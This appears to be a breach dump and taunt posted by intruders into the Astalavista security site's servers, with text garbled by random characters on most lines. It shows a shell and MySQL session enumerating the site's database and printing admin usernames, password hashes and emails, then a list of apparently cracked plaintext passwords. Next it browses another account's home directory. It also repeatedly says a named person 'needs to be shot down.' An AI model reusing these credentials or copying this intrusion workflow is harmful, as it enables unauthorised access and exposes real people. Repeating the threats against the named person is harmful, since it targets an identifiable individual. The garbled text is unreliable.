1 f* Q9 I5 }5 A$ b <link>http://www.astalavista.com/exploits</link>
' q/ t8 y7 O G& L1 A: u <description>All availably Exploits.</description>+ r# m/ t$ `" [& k, h: S
<language>en-us</language>
/ e; s! w |9 L! t$ F% |1 D# T <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>. L3 ] C7 N' [+ ~/ V) Y t/ F" g
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
' N$ _0 \4 j* [! d4 a2 r <generator>Astalavista.com</generator>, b4 L# }1 k) ?4 p6 m8 e
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘2 v' y! [1 D" V6 |
</channel>
+ b0 S1 l: s4 d" z0 A* e, g</rss>’;2 p# i, d Y$ p3 H8 E
& C8 z* H& z( s) b- {- ^ if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {1 H: i/ i$ N7 r
unlink (FULLPATH . ‘/feed/exploits.xml’);7 B4 y3 p2 R( B$ t2 X
}) s$ K# O1 @, I1 X) h* x
8 S) b- Z+ d- G* J file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);# h3 C9 y: ]& n2 m7 ?
[snip]
0 S: J* [2 ]3 ?( s; h5 F* w. Z+ k! y1 f4 R/ W
sh-3.2$ cat exploits.sh
2 W z* c8 c/ m; ~4 E#!/bin/sh' S- Q- y4 v3 O/ K$ }! ^
3 K; G% Q' a+ r4 i& e% U: R; B###########################################################/ T0 x4 @( s( H8 n3 I! Y8 g
# #
g+ W2 u A* Y6 X$ a# Title: milw0rm exploits adder #- P4 ^2 h) y# U) d. `7 S7 ~
# Description: Add all milw0rm exploits to the #
0 V* b0 c0 Q! ]2 u* S# Astalavista.com database #) F: ]3 k5 r1 f' U2 ~
# #
+ h+ i, p1 \2 e# Company: Astalavista Group #* ^2 }9 D" Q3 m1 F& j2 s L
# Author: Paulo M. Santos #
$ s5 T c4 X; C e# E-Mail: 链接标记paulo.santos@astalavista.ch #
+ x P! N4 e+ Z4 G1 G# #
! \9 w6 u: b: i* O: p m###########################################################4 O4 h! B. Y( d( _9 \' }5 `; k6 e: _
2 p9 Y& H* y# X3 P; S/ B7 k# path
( K- ?7 H$ g- T& [2 S4 Uthis_path=/home/com/public_html/modifications/cronjobs
% a/ H0 n3 h" o
i6 {6 I/ x8 |$ ]; Z. y- a# change directory0 ]# s. O6 v+ e5 @9 R
cd $this_path; k m/ }; M" F
cd tmp/: A1 a3 o0 o5 O2 `. c8 I3 K& M
- z* Z0 _2 U9 d- v& P& I
# delete files
+ C7 i9 Z7 D& ^+ X/ Prm -rf milw0rm.tar.* &
' @0 E/ f* [1 d- p! R/ xrm -rf milw0rm/ &! E( Y" J( R+ B, q
* R) E1 L' |9 L3 n$ W6 T) n" b# wget milw0rm paket9 u: u2 y% R6 \2 w& A9 M
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]' D$ k5 _1 x' X
* E6 a u% p& \- p, P) Z# k
# extract milw0rm paket. s: [- d C L7 L" `. }+ l Q
tar -xvf milw0rm.tar.bz2( W/ e; J( u5 J
; W) G2 c7 V2 {% D' H# change owner
2 H' U/ q" J9 T) D% bchown -R com .$ d! l. ?: F& {7 u4 T _3 p
chgrp -R com .3 a# @1 t( E. w6 l
. R- u/ _/ \1 i* V3 v$ d
# execute php script: T5 E9 m8 ^% `+ W8 u4 _; [
cd $this_path
' q I: v: O% l! \% V7 B9 sphp -q exploits.php1 ?! b' A7 J& Z
+ R2 w7 Z( `0 q0 ~+ p" w+ Y# delete files
4 P; _: j! ^* o/ n& I1 E; Brm -rf tmp/milw0rm.tar.*- B8 Y% D$ ?; H. h
rm -rf tmp/milw0rm/
) R; x* r! l- M& L* G9 n6 f8 I6 l5 A5 e$ y* T' w
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
2 S6 ]5 g- {8 R/ ^7 Z: IPaulo M. Santos needs to be shot down.
; ^: m1 _, f" B% W& ~
3 l+ v; C n1 v6 dmysql -u contrexxuser2 -p
2 l. M" z; b) A: G1 k1 g# yEnter password:0 _* y* w: C. w6 w+ F, V3 k; ^# V
Welcome to the MySQL monitor. Commands end with ; or \g.5 n- Q" D8 ` C. C. W, h* A$ [
Your MySQL connection id is 261694
/ i7 |6 c! R/ i5 aServer version: 5.0.45-community-log MySQL Community Edition (GPL)) _4 W; d1 ?5 L* A$ t& M
, z5 q9 Z8 |" f' o9 z: [
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.5 ]# l# O+ a$ K5 H" U
% i/ h# h* u1 l
mysql> show databases;8 y. h+ T7 }1 b
+——————–+; Q0 r1 a4 {: H$ Q
| Database |
" q% E* S8 [: v3 y1 X: Q6 h9 o2 }+——————–+1 [; ^5 w4 Y. _* B
| information_schema |
* p' b: u' x3 {5 h' @| com_contrexx2 |
# ^, Q% @4 Y5 b! L }| com_contrexx2_live |
! d3 Q( ^# ^* e" p; L8 O% c8 w' H| test |' F% i, J& V7 d8 u
+——————–+
1 D6 T8 g/ \$ |9 O4 rows in set (0.00 sec)
- ?7 p& Z6 j0 E, M: F' h( P3 S' C0 G
+ @, m q7 Q8 H! qmysql> use com_contrexx2_live7 x. H* C: J! c- d$ f+ W
Database changed1 o; f+ D ?. e. Y- g8 a5 |
mysql> show tables; R, d5 W& V3 X5 i- \0 o0 ]
+————————————————–+
3 ?" ~ X9 A. \$ b! k" ?" J+ Q| Tables_in_com_contrexx2_live |9 j0 W4 Z8 C# z+ R& e- t2 {
+————————————————–+2 h: j9 q1 I9 I
| cc_banner_counter |
5 P; c9 m" |( d8 P| cc_search_counter |
. J6 t. m3 _2 o6 b| contrexx_access_group_dynamic_ids |
; s; D6 R! B7 i9 K# Q: T% C7 B| contrexx_access_group_static_ids |
' A$ [8 V4 A7 n( _, a9 p2 ~| contrexx_access_rel_user_group |6 p3 X3 Q1 ~* k. u" ?
| contrexx_access_settings |
+ i/ p. j* N+ j' H5 X* q/ s }| contrexx_access_user_attribute |
8 O$ o: c; p$ n5 U; a, x+ R| contrexx_access_user_attribute_name |
2 q' q9 e) m& S8 G| contrexx_access_user_attribute_value |" E: }* A& f t! y g
| contrexx_access_user_core_attribute |' G) `* x: p* x2 x" b! y5 W4 A
| contrexx_access_user_groups |
! q, Z# l; H9 M" O5 _| contrexx_access_user_mail |
5 S2 L5 U: m ^/ ? r| contrexx_access_user_profile |
: [8 ?; b- I8 f! J# _| contrexx_access_user_title |
; e% W) R0 n- b' a9 e! q| contrexx_access_user_validity |
! l& |. y) i% @' G| contrexx_access_users |# c$ h& ~- [! Z& B# F
| contrexx_backend_areas |" X4 ~% L7 Y) D# O P3 W. n* v
| contrexx_backups |1 V" x# p8 d# i1 K
| contrexx_content |
0 @1 P; k! ]* i5 [& ]8 Y| contrexx_content_history |1 ~/ s; X( C. I, f' ]2 d
| contrexx_content_logfile |
# o1 w4 }5 H4 a8 P| contrexx_content_navigation |' y( T, }( h7 R) ^+ [( u, F
| contrexx_content_navigation_history |! U& Q+ E5 Q6 [/ T1 F8 s
| contrexx_ids |$ }/ ~8 V+ v; P+ `: w4 V4 P d9 O
| contrexx_languages |& [2 }4 |% O! y3 Q* B$ u e
| contrexx_lib_country |
# h0 @' _4 b8 W1 i| contrexx_log |
* b5 J- C; p( P/ N; y; \6 l( u1 R| contrexx_module_alias_source |
6 d7 G6 Y+ u* c) Y% I/ [| contrexx_module_alias_target |
% L7 K: }- T; y- V| contrexx_module_block_blocks |( F6 \4 M: R( [4 K3 z9 A$ _6 _
| contrexx_module_block_rel_lang |
( U3 V6 X9 u6 k% |, {| contrexx_module_block_rel_pages |
/ T5 v6 U/ K# A: o8 `* y d$ o| contrexx_module_block_settings |% B6 P9 o# L& W! ]9 k6 \0 l
| contrexx_module_blog_categories |
% P% Z8 I. H' w7 S| contrexx_module_blog_comments |- Y, z3 d; L! T+ _8 W
| contrexx_module_blog_message_to_category |
' s* T) X( J9 X' q6 B; e$ g R| contrexx_module_blog_messages |
" Y1 \" {' W) ~# u5 k+ || contrexx_module_blog_messages_lang |
& L5 L, X! M( ~/ \| contrexx_module_blog_networks |
3 r1 }4 V: |& F- K/ q+ F. S8 y| contrexx_module_blog_networks_lang |
( ^+ g4 Y7 C' R1 D; r3 s% d| contrexx_module_blog_settings |
) p* H7 v+ ]9 ?7 s| contrexx_module_blog_votes |$ T0 j4 a7 R! c5 Y* A$ ]2 A
| contrexx_module_calendar |: V# ]! v7 R5 O) b. J# p0 U, O
| contrexx_module_calendar_access |
9 x6 `9 O; }+ `1 }- `, U% M| contrexx_module_calendar_categories |+ j' o; P6 W0 n7 D+ u. K+ E2 c
| contrexx_module_calendar_form_data |- Y: X: W; d5 }% a+ r- Q8 k% c8 ]
| contrexx_module_calendar_form_fields |' j X* w: p9 e# r6 Q% d
| contrexx_module_calendar_registrations |! n/ S; P# l5 ]$ l" I+ {/ |
| contrexx_module_calendar_settings |' Z; k: d, C% o! m- T
| contrexx_module_calendar_style |% T: O2 Y; R0 Y5 J6 ]9 k
| contrexx_module_contact_form |
& z$ n5 n" n6 B7 U2 ~7 j8 n' v$ p| contrexx_module_contact_form_data |4 w" i% |7 a- e% h2 E4 I1 I0 K
| contrexx_module_contact_form_field |1 J( \3 K3 K3 Y5 [2 r
| contrexx_module_contact_settings |
- g4 [7 ?' A/ j3 I, X| contrexx_module_data_categories |5 s+ ?% w0 x! D" p; K
| contrexx_module_data_message_to_category |4 T$ D5 r8 J' O
| contrexx_module_data_messages |
]3 J+ m. }) j* \| contrexx_module_data_messages_lang |2 ]3 w: Q1 j2 A$ j! a
| contrexx_module_data_placeholders |
M- u1 x* j) m# Z U6 c& s$ }* a| contrexx_module_data_settings |+ A& u* Y/ D4 l
| contrexx_module_directory_access |( T4 _2 d2 R! K3 U, e! B' y7 m( C
| contrexx_module_directory_categories |! R6 `5 J8 q, Z+ D0 K0 N
| contrexx_module_directory_dir |; ~3 ^7 R4 P/ I- y
| contrexx_module_directory_inputfields |
+ ]5 l2 N6 C; f5 F/ ~6 C| contrexx_module_directory_levels |) J+ z* d- ?# E
| contrexx_module_directory_mail |
8 [3 u; p4 i/ _- j9 |9 [/ M| contrexx_module_directory_rel_dir_cat |
* y) x3 h0 C# n| contrexx_module_directory_rel_dir_level |
/ d+ Y3 [2 h7 x0 k* H* @: t2 } ?) ?| contrexx_module_directory_settings |
' W9 N+ ?. t5 A4 m" c| contrexx_module_directory_settings_google |
; J1 @. z/ p: y% F. z: ]| contrexx_module_directory_vote |$ L5 A, f; y$ w" s) g1 p5 X
| contrexx_module_docsys |
- t( ^5 s4 e _$ m' n' v2 A! e| contrexx_module_docsys_categories |6 Y# ?+ e; _0 _% v+ j
| contrexx_module_egov_configuration |. Y% ]# g) B J1 j7 R
| contrexx_module_egov_orders |7 m3 k2 d2 M4 U, b
| contrexx_module_egov_product_calendar |/ L( A- P/ v" P
| contrexx_module_egov_product_fields |) k+ U, e) |/ u0 W) W' g. i; a4 k
| contrexx_module_egov_products |8 _, ?- ^3 ]" ~- }' {7 r' s
| contrexx_module_egov_settings |
4 G% J4 r9 z5 |3 }4 q| contrexx_module_exploits |
' l3 c- b/ i2 q* B% n| contrexx_module_exploits_categories |
3 q7 r0 P/ m, k9 t| contrexx_module_feed_category |+ x4 x% S/ @ T0 K
| contrexx_module_feed_news |
- I) d q6 \+ L6 a, k$ E| contrexx_module_feed_newsml_association |2 d/ }# {/ X7 f1 D% c9 [; M- [* M
| contrexx_module_feed_newsml_categories |
4 D2 j/ C& P1 B, ?' h/ O/ P| contrexx_module_feed_newsml_documents |8 q7 w/ a. z" K# |' r2 }# d
| contrexx_module_feed_newsml_providers |" ?2 P# Y) D& C5 k- T
| contrexx_module_forum_access |
! \- P8 @' j/ e `% y| contrexx_module_forum_categories |
7 m# k. q0 Z" A" c2 Y| contrexx_module_forum_categories_lang |
: ]" ^+ h# h, u- A9 b3 \' Q! p| contrexx_module_forum_notification |# w J* z$ G% q1 m+ S k
| contrexx_module_forum_postings |
% x& ~" w v5 a* Z: R+ m| contrexx_module_forum_rating |
: G" {# M- \: z. d% j| contrexx_module_forum_settings |0 m3 }8 S0 @% U3 M, L
| contrexx_module_forum_statistics |' i7 z7 q ^5 }) h' E
| contrexx_module_gallery_categories |& M7 o$ O$ ~) \; C; V- @
| contrexx_module_gallery_comments |
7 s. R2 M! X* j% h0 O0 }| contrexx_module_gallery_language |
4 V/ e' O- e t| contrexx_module_gallery_language_pics |- Q3 _+ t/ W3 {# V' a
| contrexx_module_gallery_pictures |
1 p e r# k4 ^( W. U0 j; _| contrexx_module_gallery_settings |" z; K e" X* M+ y% y* {
| contrexx_module_gallery_votes |
+ T1 B) l5 l/ X( y| contrexx_module_guestbook |( S- C+ G( h1 I" k1 @- m+ y& @4 q
| contrexx_module_guestbook_settings |, x/ w5 |9 t& u( ~: ?0 B& a/ @5 W
| contrexx_module_livecam |/ K" a4 C- b2 y t0 a
| contrexx_module_livecam_settings |
9 {) X0 m& M6 b, J| contrexx_module_market |# _1 M: F; _" [
| contrexx_module_market_access |0 h- z9 S9 t. r" W }+ u, l R+ \
| contrexx_module_market_categories |
3 V9 U% E, g- p$ W# X| contrexx_module_market_mail |6 y$ R, x' X4 J# X: q
| contrexx_module_market_paypal |7 P% Z0 i. d3 C9 \: _
| contrexx_module_market_settings |- {3 D- U; n9 I* e8 S9 Y, U% o/ z
| contrexx_module_market_spez_fields |' |+ a/ Z2 y4 r$ Q% X: ?8 e- y
| contrexx_module_mediadir_access |
5 n" e6 u$ ~$ L+ _/ b| contrexx_module_mediadir_categories |( E; [% E4 H8 y# u1 {3 \+ `0 {
| contrexx_module_mediadir_comments |
7 g; K* E/ }$ F| contrexx_module_mediadir_dir |
. V3 u4 N0 o6 J6 @) I| contrexx_module_mediadir_inputfields |
s) X/ c; J0 v- \4 G| contrexx_module_mediadir_levels |
. ^$ y1 b6 I( Q: Y" a| contrexx_module_mediadir_mail |5 p5 @2 B' @. l6 G$ h$ {: v
| contrexx_module_mediadir_rel_dir_cat |; P9 K& P, g: m$ h
| contrexx_module_mediadir_rel_dir_level |
* f& K y- k) f8 J# M/ j1 j| contrexx_module_mediadir_reports |
0 ^ G v+ Z& O| contrexx_module_mediadir_settings |0 _1 f Z6 o1 e- o" s
| contrexx_module_mediadir_settings_google |
( I) N# Q9 w- T5 N2 P| contrexx_module_mediadir_vote |2 {' f) b# @& \1 c5 F! Y6 i$ O+ h/ J
| contrexx_module_memberdir_directories |
3 R0 j& z f$ W( z0 [| contrexx_module_memberdir_name |
( G# y' e5 f b) @1 Z| contrexx_module_memberdir_settings |
4 L: X3 ^' X% o| contrexx_module_memberdir_values |
3 S' \' ^6 s& B$ N; e7 H! t9 T. ^| contrexx_module_nettools_allowed_groups |- { O: e% W) r6 ?
| contrexx_module_nettools_settings |4 U& a* v6 ^1 D1 b
| contrexx_module_news |, o& q: C, d9 u( ?8 L
| contrexx_module_news_access |
) T+ e, B- b7 Y1 C| contrexx_module_news_categories |; c# K3 M0 {% L4 a6 L ]! N7 @
| contrexx_module_news_settings |% R0 f" r0 g- |8 Y. Y( m; v% j
| contrexx_module_news_teaser_frame |
$ C5 E$ u$ F7 k# c4 l' E c B| contrexx_module_news_teaser_frame_templates |0 z% p* ~) a* Y9 o
| contrexx_module_news_ticker |; J; f# l" m8 {3 q. x
| contrexx_module_newsletter |0 C2 e4 R; W& J1 _
| contrexx_module_newsletter_attachment |
* G# `5 y: ?" ]% o! r/ O) Q6 r6 g| contrexx_module_newsletter_category |/ N5 ~0 m# ]2 g3 v9 ~
| contrexx_module_newsletter_confirm_mail |% K6 x- o2 M: C1 y: z. d9 w7 V* {
| contrexx_module_newsletter_rel_cat_news |
9 Y/ a0 [9 s6 c- H. ?3 H" |+ H| contrexx_module_newsletter_rel_user_cat |
9 j, j& c- G) ~& D% [% Y| contrexx_module_newsletter_settings |5 v( C' l" v/ i' \9 {
| contrexx_module_newsletter_template |
# A/ a( l. G! L1 e& o `| contrexx_module_newsletter_tmp_sending |6 S- L' N2 b. J. _5 O6 F$ [, Y
| contrexx_module_newsletter_user |3 i, O! }- c( x1 E+ A/ p4 i$ t
| contrexx_module_newsletter_user_title |" a/ G* k+ o) |( X% p* S4 A4 q
| contrexx_module_onlinetools_defaultports |/ t7 x1 f! r7 W9 F
| contrexx_module_onlinetools_defaultports_back |
# G5 J* z5 i+ ~* T9 Q6 ^| contrexx_module_onlinetools_geolitecity_blocks |) @$ Q2 c0 p3 i2 `
| contrexx_module_onlinetools_geolitecity_country |0 h( z& D# k5 N' `9 {$ ?
| contrexx_module_onlinetools_geolitecity_location |0 l) _- M3 P$ ~& ^8 T
| contrexx_module_podcast_category |: h( N4 ?( b |5 b
| contrexx_module_podcast_medium |
2 Z! `, |" P* S7 v" @6 W/ W| contrexx_module_podcast_rel_category_lang |
/ y8 Q! i5 t# s! J| contrexx_module_podcast_rel_medium_category |
2 C) h: h0 A; G( m/ a# I| contrexx_module_podcast_settings |9 h/ a* |: f- g- N5 Q& b9 }9 `
| contrexx_module_podcast_template |
9 q9 @5 n; ~6 F, P3 @| contrexx_module_proxydb |7 R5 R/ u+ b1 C1 I$ @6 R% F, v
| contrexx_module_recommend |
9 n o. k. k; q| contrexx_module_repository |
5 t* ]+ c: k5 i* X% F| contrexx_module_securitynews_cats |! N) u0 _& Y1 ], d( q: N6 h
| contrexx_module_securitynews_feeds |& a# u* S+ [4 R: w b1 g
| contrexx_module_securitynews_news |; {7 i! U8 w5 L7 _- {7 M
| contrexx_module_shop_categories |
* T8 }- y2 d6 M5 t: |+ K| contrexx_module_shop_config |
1 H( l! q3 m9 _4 V, ?3 c; }| contrexx_module_shop_countries |& l0 N: F1 U' A
| contrexx_module_shop_currencies |) D ]( |, S' O6 R& K( g! g" V D
| contrexx_module_shop_customers |
- Y5 R4 s5 R) v& X: g. h' I| contrexx_module_shop_importimg |
9 M8 r$ O) f+ B* Q. ~& ^" E# r| contrexx_module_shop_lsv |5 t4 ]+ e, \5 _* [
| contrexx_module_shop_mail |$ h; s0 k& X8 D2 t' `* X
| contrexx_module_shop_mail_content |2 F4 M+ o+ }* x. K: d
| contrexx_module_shop_manufacturer |
* K+ _' ^, N# F% T5 ^2 B( X| contrexx_module_shop_order_items |
8 O/ s3 G M1 g| contrexx_module_shop_order_items_attributes |
7 L+ x G! e2 |% U# a' Q' n+ @; f4 ^) X4 a| contrexx_module_shop_orders |
- y$ K' ^/ I+ Q. @9 H5 h$ Y| contrexx_module_shop_payment |+ A( D5 ]/ a% z2 r% o
| contrexx_module_shop_payment_processors |
) t! O0 k4 q6 H6 p5 Z8 T p7 S( Z| contrexx_module_shop_pricelists |
1 t# H4 t5 ]0 e| contrexx_module_shop_products |
: I& R/ @3 n0 q6 E& e5 Y| contrexx_module_shop_products_attributes |5 b9 V/ S2 T+ t+ ?5 N- Q! H8 Z
| contrexx_module_shop_products_attributes_name |- F! I* g, R3 n x
| contrexx_module_shop_products_attributes_value |( b5 U3 N; O; N* \% j9 ^
| contrexx_module_shop_products_downloads |
/ s( G3 S# z1 O) D5 r| contrexx_module_shop_rel_countries |
; ^6 @, G1 D- w. \) H9 @5 J| contrexx_module_shop_rel_payment |" M/ A) P# p+ `2 O# u( l
| contrexx_module_shop_rel_shipment |, }) G# F, b2 v' l" z
| contrexx_module_shop_shipment_cost |5 A* O$ q2 D4 }9 x, ?
| contrexx_module_shop_shipper |5 g- s8 u( A# i9 U4 B7 q0 [# X" g
| contrexx_module_shop_vat |
- V" l6 D. \( f+ S: `' J2 ?| contrexx_module_shop_zones |0 v* S/ \! L" b2 _) Q
| contrexx_module_u2u_address_list |
7 a( @' q- ~; Q0 e3 K8 O5 y| contrexx_module_u2u_message_log |- B r8 K- I1 ^, O g
| contrexx_module_u2u_sent_messages |
# k; Z9 e, F3 B6 `$ \# T| contrexx_module_u2u_settings |
7 Y/ T6 v5 u% _2 G" _! S| contrexx_module_u2u_user_log |# y9 L m \, o! ^
| contrexx_modules |. k# e3 |$ [4 T6 K
| contrexx_sessions |" ~' v" K/ J$ B
| contrexx_settings |
; H8 T X+ B t, i| contrexx_settings_smtp |
9 W4 B+ B4 r4 I2 h| contrexx_skins |# x$ X* ?" I0 q- U
| contrexx_stats_browser |& t ?" Q, e/ w2 E
| contrexx_stats_colourdepth |
. C% A% d R7 Z| contrexx_stats_config |$ { B- z2 ~; d6 Q/ v0 e/ X
| contrexx_stats_country |1 E" z: }3 U% {
| contrexx_stats_hostname |
/ X' L- [8 X: {# q* U! T| contrexx_stats_javascript |3 q7 g" J0 t8 s" r
| contrexx_stats_operatingsystem |' t* i- h5 c) M! e
| contrexx_stats_referer |- r7 z& x# H7 y6 s7 K8 `
| contrexx_stats_requests |
: b- k, ^% s; N5 T# l| contrexx_stats_requests_summary |- M2 |) W t$ o3 E
| contrexx_stats_screenresolution |, m, V/ r! h' |7 ]) v7 N
| contrexx_stats_search |2 c2 P( f. i/ r2 d- |$ n, u& Q" U
| contrexx_stats_spiders |
0 J, [/ N1 V9 A% @( N+ F- f& `| contrexx_stats_spiders_summary |# g3 `# e5 b* {6 d! A/ ^- B
| contrexx_stats_visitors |
; t% m6 t0 r. r" L5 K9 f3 d| contrexx_stats_visitors_summary |$ [; b' O! C+ D. z; d- Y$ [* D1 h
| contrexx_voting_additionaldata |9 d+ N$ S y5 h* x
| contrexx_voting_email |
) Y8 P! ]" Z. ~) {. ]3 w. }| contrexx_voting_rel_email_system |1 V* p$ r$ q' s0 K5 `1 x, b
| contrexx_voting_results |2 r' {3 W# f, r0 ]) A
| contrexx_voting_system |0 R, o) i) L6 O
| foo |0 K7 i6 b3 D) V6 l
+————————————————–+
: d1 j8 u$ u/ H* b% ^ F) o1 H227 rows in set (0.01 sec)
' i* @8 i+ \2 w9 G4 ^/ e) a5 V$ y' ?# \
mysql> select count(*) as skids from contrexx_access_users;
% o8 K; V4 Z. c+ ^+——-+% Z; Y! z8 m9 _( X4 [( g2 u: G I
| skids |# n( I1 p5 o. i, O. s+ q
+——-+- E+ @: b" f1 x# _$ A
| 53699 |
. s Y1 q# ^- L2 u: E+——-+
. D8 }1 e' K. [1 row in set (0.00 sec)
$ b7 L* C- W, L* m
" j0 R5 `$ q- P, d) p9 umysql> describe contrexx_access_users;
' T2 y( y3 ~0 o- t, v+ G+——————+——————————————+——+—–+————–+—————-+0 x* n; V$ @6 N2 d* \8 d
| Field | Type | Null | Key | Default | Extra |* G/ s+ i: {1 }7 F9 _$ g
+——————+——————————————+——+—–+————–+—————-+* u$ d6 K E: c9 `# e
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
/ w3 K; Z& u! G; n7 f }| is_admin | tinyint(1) unsigned | NO | | 0 | | o/ A# [6 [0 l: H0 i- b! L' t; ?% I8 Z
| username | varchar(40) | YES | MUL | NULL | |
& }( K7 p4 z& A| password | varchar(32) | YES | | NULL | |
9 o2 V9 k& z D& U, H0 ^| regdate | int(14) unsigned | NO | | 0 | |2 E) t4 D I. Q% v( Y
| expiration | int(14) unsigned | NO | | 0 | |+ ~& T2 k; h0 X( A/ ]
| validity | int(10) unsigned | NO | | 0 | |
. S6 Q$ v5 k2 Y, s- P5 V| last_auth | int(14) unsigned | NO | | 0 | | P6 Q$ W$ \" T y& O, _+ U
| last_activity | int(14) unsigned | NO | | 0 | |
+ D( \" `/ J/ x: k/ D$ k' K s| email | varchar(255) | YES | | NULL | |
" e3 @& j& u' H2 K \$ ^/ E$ A| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |4 g" T: x+ J. a: ^
| frontend_lang_id | int(2) unsigned | NO | | 0 | |# R( I: y! h4 B; V" h& Z
| backend_lang_id | int(2) unsigned | NO | | 0 | |
8 _7 s3 ~( K/ J& F| active | tinyint(1) | NO | | 0 | |
; y5 [5 q Z% u| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |6 O! G; s, X% C( {4 v4 q& ~
| restore_key | varchar(32) | NO | | | |
\& ]* J" E' k2 `7 m% d4 w| restore_key_time | int(14) unsigned | NO | | 0 | |* ]. o: q6 x3 t" R. u
| u2u_active | enum(’0′,’1′) | NO | | 1 | |
/ R4 ^% Q8 C' g0 Y6 }3 A+——————+——————————————+——+—–+————–+—————-+$ O7 D. F1 v2 _
18 rows in set (0.00 sec)
3 ]$ N( h9 N8 J( O |$ I* A5 A
, S1 P. T. p& q7 y/ a2 _mysql> select username,password,email from contrexx_access_users where is_admin = 1;
8 M' g7 R+ f& u- W1 W+————+———————————-+—————————–+9 `" N% X$ w. C
| username | password | email |
9 q1 r: l4 b2 m# Q" O+————+———————————-+—————————–+$ ^$ @( f+ ?( q5 X) E0 W
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
" O C) T6 E% S- d' V+ H- P| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
( K6 O5 k" w8 @) L| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |% b0 `* T) b; d' ^7 V5 b! ~- u
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |/ g0 d5 U& Q8 }. w) c
+————+———————————-+—————————–+3 c' e- O* o+ t$ V5 C$ Y. C2 {% @
4 rows in set (0.04 sec); V o- q; U7 J
& C2 s' h4 @# H k3 G2 B
mysql> exit;! S p' O: e* |* E
Bye- o5 o+ l3 y( z
T1 T4 ?# S' S6 L( W$ o* V
[~] There you go, your “team of security and IT professionals” is a joke.
2 X) z3 H4 U# g% L7 s
, v/ [' V8 V; a* k9 D) g+——————————+
* c8 x% G6 E9 l5 r- [3 lsystem:f82BN3+_*5 l2 V( u, O; @; O; o1 J
Be1er0ph0r:belerophor4astacom
8 x$ q6 J! f5 q* Y+ M) T& n; rprozac:asta4cms!
1 l$ B3 f- O8 l. Y2 \4 Tcommander:mpbdaagf6m9 U+ `( L& Z7 z9 s: K& e, U( c
sykadul:ak29eral% n( d6 V, Z, F
+——————————+
) k* F/ w! k& a9 T0 q% w0 F3 m5 {1 S% R
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)$ N, j3 v3 b% N, j* f) e4 s6 o
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
4 l" ^% ^. T. D: S1 y0 c& Z, g
, e# H/ ]$ n' ? m[~] Lets move to astalavista.net now,
# Y9 o- `% R8 s. V2 @
- o2 _% r% A3 O% T+ w. z1 sFrom <链接标记[url]https://www.astalavista.net/[/url]>:! e, d7 u0 G3 l3 N
>> Everyone knows that the best defense is a good offense.
N) a0 Z% _) b0 D" P! R; V>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.# p `& |: s3 H' }6 B
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.. S+ L2 j( n1 I) m
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”# {6 ]1 W% x# d q% J1 y" B
9 _+ s; h2 J3 Y! ^5 w>> Go ahead, try and hack our server . in a completely legal way!6 F! e3 G2 G4 B1 B" t5 W2 }" v! s
>> Learn by doing: We offer our members tricky tasks and challenges on an6 O0 V D, s5 _6 Z$ e0 d3 H
>> ongoing basis so you can test your knowledge and abilities. You can also
& O6 a) v! h, h2 a>> demonstrate what you.ve mastered by taking part in regular hacker contests
7 ^! u3 e( I% x! z1 R6 y. \% f>> and war games
. g |: }4 Q1 t u& X P r7 r; B
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
8 P' b# t* R+ H4 k
" M& w& x) h! F' ]! B/ m: c6 j$ ?[-] Tricky task: Find home dir of astalavista.net; P+ ^3 @" Q4 ^5 P# A
0 Q4 f. W3 ~" ^$ b" X2 E
sh-3.2$ ls -la ~astanet2 ~, W: z8 o4 s# B& e! W
total 48) Q# B% D; c2 j+ s/ l5 |
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .0 |: K) s, m5 L" ^: B6 u
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
+ {5 g# k; P" A- m1 D6 v9 rdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth& v8 U( u' {" ?4 C
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history' v1 }* B$ e; d- g) s/ R2 Z' f
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout1 k8 V* x4 ]7 l5 T
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile5 e% ^: u8 H* T7 _
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
% P! O- S# g- l+ `drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
1 [; t3 B* R6 ^" wdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap+ ~8 j! U9 ]9 }+ i/ G: q
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail8 H, y1 ]8 ]# [$ @/ y) ?
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html$ b4 g( a. M( j
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
: q1 u c) ], Z) Q+ @: `# q! g+ k! i7 e
2 m: [3 a, I6 {' ash-3.2$ cd /home/astanet/domains/astalavista.net/private_html/ l0 f( b/ k& c: J6 ^
sh-3.2$ ls -la# u( r! ?+ H# n. T j5 D0 a
total 200
$ _- b8 A' S4 P! [( ^' jdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .( N* j3 Q- j: Z8 X- v( B9 ~1 A2 M
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
